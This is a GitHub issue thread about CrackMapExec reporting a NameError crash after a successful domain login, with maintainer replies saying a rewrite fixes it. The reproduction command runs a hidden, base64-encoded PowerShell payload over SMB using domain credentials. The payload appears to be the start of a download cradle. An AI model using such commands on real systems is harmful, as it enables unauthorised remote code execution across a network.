### ISSUE TITLE
Domain admin successful execution on PC but with NameError thrown

### ISSUE THREAD

**Issue by jaredbarez** [byt3bl33d3r/CrackMapExec#40]
python crackmapexec.py -t 8 -u USERNAME -p PASSW -d DOMAIN --execm smbexec -x 'powershell.exe -nop -nonl -W Hidden -Enc JAB3AGMAPQBOAGUAdwAtAE8AQgBqAEUAQwBUACAAUwBZAFMAdABlAE0ALgBOAEUAVAAuAFcAZQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAAOwAgAHIAdgA6ADEAMQAu... ... etc.' 1.2.3.4

[*] 1.2.3.4:445 is running Windows 6.1 Build 7601 (name: PC) (domain: DOMAIN)
[+] 1.2.3.4:445 Login successful DOMAIN\USERNAME:PASSW
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "crackmapexec.py", line 3118, in connect
    result = executer.run(host)
  File "crackmapexec.py", line 2259, in run
    smb_server = SMBServer()
NameError: global name 'SMBServer' is not defined
<Greenlet at 0x7f496f0c6cd0: connect('1.2.3.4')> failed with NameError

** FYI the IP (1.2.3.4 in example above) had both netbios and dns name defined.

commit is 9d15d52df1c42e589ead04b71d0f570baee2dd60

**Comment by byt3bl33d3r** [comment]
@jaredbarez I'm currently in the process if rewriting the tool from scratch, should be done by the end of this weeked

**Comment by byt3bl33d3r** [comment]
@jaredbarez new version just dropped, this should be fixed
